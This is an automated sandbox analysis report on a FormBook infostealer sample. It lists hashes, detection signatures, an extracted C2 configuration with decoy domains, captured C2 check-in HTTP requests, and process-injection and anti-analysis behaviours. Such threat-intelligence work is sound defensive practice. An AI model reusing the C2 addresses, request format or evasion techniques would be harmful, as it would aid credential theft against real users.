Windows Analysis Report 85vLO1Rpcy.exe

Overview

General Information

Sample Name: 85vLO1Rpcy.exe
Analysis ID: 452681
MD5: 91663bee11ec2466c36ff85805041fff
SHA1: 944de18e73bbcf9807c960ba925641211d46cd6e
SHA256: b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
Tags: exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
Multi AV Scanner detection for submitted file
Source: 85vLO1Rpcy.exe ReversingLabs: Detection: 47%
Yara detected FormBook
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: 85vLO1Rpcy.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.85vLO1Rpcy.exe.2040000.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.cscript.exe.4c87960.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.cscript.exe.2848758.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: 85vLO1Rpcy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
Source: Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 4x nop then pop esi 2_2_00415852
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 4x nop then pop ebx 2_2_00406A98
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 4x nop then pop edi 2_2_00415699
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop ebx 9_2_02776A99
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop esi 9_2_02785852
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 9_2_02785699

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 172.67.129.33:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.extinctionbrews.com/dy8g/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.241.62.54 162.241.62.54
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.fitnesstwentytwenty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.sprinkleresources.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.professioneconsulenza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.iwccgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.manageoceanaccount.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.fitnesstwentytwenty.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 15:58:59 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmp String found in binary or memory: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004181D0 NtCreateFile, 2_2_004181D0
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00418280 NtReadFile, 2_2_00418280
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00418300 NtClose, 2_2_00418300
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004183B0 NtAllocateVirtualMemory, 2_2_004183B0
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_00418222 NtCreateFile, 2_2_00418222
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Code function: 2_2_004183AA NtAllocateVirtualMemory, 2_2_004183AA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_047B9860
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9840 NtDelayExecution,LdrInitializeThunk, 9_2_047B9840
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9540 NtReadFile,LdrInitializeThunk, 9_2_047B9540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_047B9910
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B95D0 NtClose,LdrInitializeThunk, 9_2_047B95D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B99A0 NtCreateSection,LdrInitializeThunk, 9_2_047B99A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_047B9660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9A50 NtCreateFile,LdrInitializeThunk, 9_2_047B9A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9650 NtQueryValueKey,LdrInitializeThunk, 9_2_047B9650
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_047B96E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B96D0 NtCreateKey,LdrInitializeThunk, 9_2_047B96D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9710 NtQueryInformationToken,LdrInitializeThunk, 9_2_047B9710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9FE0 NtCreateMutant,LdrInitializeThunk, 9_2_047B9FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9780 NtMapViewOfSection,LdrInitializeThunk, 9_2_047B9780
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047BB040 NtSuspendThread, 9_2_047BB040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9820 NtEnumerateKey, 9_2_047B9820
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B98F0 NtReadVirtualMemory, 9_2_047B98F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B98A0 NtWriteVirtualMemory, 9_2_047B98A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B9560 NtWriteFile, 9_2_047B9560
